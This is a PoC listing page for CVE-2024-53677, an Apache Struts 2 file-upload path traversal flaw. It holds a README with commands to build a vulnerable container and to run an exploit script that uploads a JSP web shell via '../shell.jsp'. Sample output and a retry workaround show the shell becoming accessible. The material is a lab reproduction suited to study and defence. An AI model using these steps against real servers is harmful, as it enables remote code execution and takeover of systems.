CVE-2024-53677 PoC — Apache Struts 安全漏洞

Source

Associated Vulnerability

Description

Vulnerable Environment and Exploit for CVE-2024-53677

Readme

 CVE-2024-53677 - Apache Struts 2 Remote Code Execution Vulnerability (RCE) Reproduction Environment

This repository provides a container-based environment to reproduce the CVE-2024-53677 vulnerability in Apache Struts 2. This vulnerability involves path traversal and allows for arbitrary code execution (RCE) through the file upload functionality in Struts 2.

## Setup Instructions

The environment can be built and run using Podman. Follow these steps to set up the application:

```sh[
git clone https://github.com/seanrickerd/CVE-2024-53677.git
cd CVE-2024-53677 
podman build --ulimit nofile=122880:122880 -m 3G -t cve-2024-53677 .
podman run -d -p 8080:8080 --ulimit nofile=122880:122880 -m 3G --rm -it --name cve-2024-53677 cve-2024-53677
```
Running the exploit: 

```sh
pip install -r requirements.txt
python S2-067.py -u http://localhost:8080 --upload_endpoint /upload.action --files newshell.jsp --destination ../newshell.jsp
```
There is an intermittent issue where the file will upload properly but will not be accessible. To work around this, you will need to add an extra . to the destination, then re-run the original command. 

```sh
$ python S2-067.py -u http://localhost:8080 --upload_endpoint /upload.action --files shell.jsp --destination ../shell.jsp
[INFO] Uploading files to http://localhost:8080/upload.action...
[SUCCESS] File newshell.jsp uploaded successfully: ../shell.jsp
[INFO] Verifying uploaded file: http://localhost:8080/shell.jsp
[INFO] File not accessible. HTTP Status: 404
$ python S2-067.py -u http://localhost:8080 --upload_endpoint /upload.action --files shell.jsp --destination .../shell.jsp
[INFO] Uploading files to http://localhost:8080/upload.action...
[SUCCESS] File newshell.jsp uploaded successfully: .../shell.jsp
[INFO] Verifying uploaded file: http://localhost:8080/.../shell.jsp
[INFO] File not accessible. HTTP Status: 404
$ python S2-067.py -u http://localhost:8080 --upload_endpoint /upload.action --files shell.jsp --destination ../shell.jsp
[INFO] Uploading files to http://localhost:8080/upload.action...
[SUCCESS] File newshell.jsp uploaded successfully: ../shell.jsp
[INFO] Verifying uploaded file: http://localhost:8080/shell.jsp
[ALERT] File uploaded and accessible: http://localhost:8080/shell.jsp
```
The shell will be accessible via a browser at http://localhost:8080/shell.jsp

File Snapshot

 [4.0K]  /data/pocs/97833870b6af64d294a56b45f085952b85d3c398
├── [1.3K]  context.xml
├── [ 612]  Dockerfile
├── [2.3K]  README.md
├── [ 512]  requirements.txt
├── [5.5K]  S2-067.py
├── [ 877]  shell.jsp
├── [4.0K]  struts-app
│   ├── [8.9K]  mvnw
│   ├── [5.7K]  mvnw.cmd
│   ├── [3.7K]  pom.xml
│   ├── [4.0K]  src
│   │   └── [4.0K]  main
│   │       ├── [4.0K]  java
│   │       │   └── [4.0K]  org
│   │       │       └── [4.0K]  trackflaw
│   │       │           └── [4.0K]  example
│   │       │               └── [2.0K]  Upload.java
│   │       ├── [4.0K]  resources
│   │       │   └── [1.2K]  struts.xml
│   │       └── [4.0K]  webapp
│   │           ├── [ 219]  index.html
│   │           └── [4.0K]  WEB-INF
│   │               ├── [ 587]  error.jsp
│   │               ├── [ 658]  success.jsp
│   │               ├── [ 705]  upload.jsp
│   │               └── [1.1K]  web.xml
│   └── [4.0K]  target
│       └── [4.0K]  classes
│           ├── [4.0K]  org
│           │   └── [4.0K]  trackflaw
│           │       └── [4.0K]  example
│           │           └── [2.5K]  Upload.class
│           └── [1.2K]  struts.xml
└── [ 219]  tomcat-users.xml

15 directories, 19 files

Remarks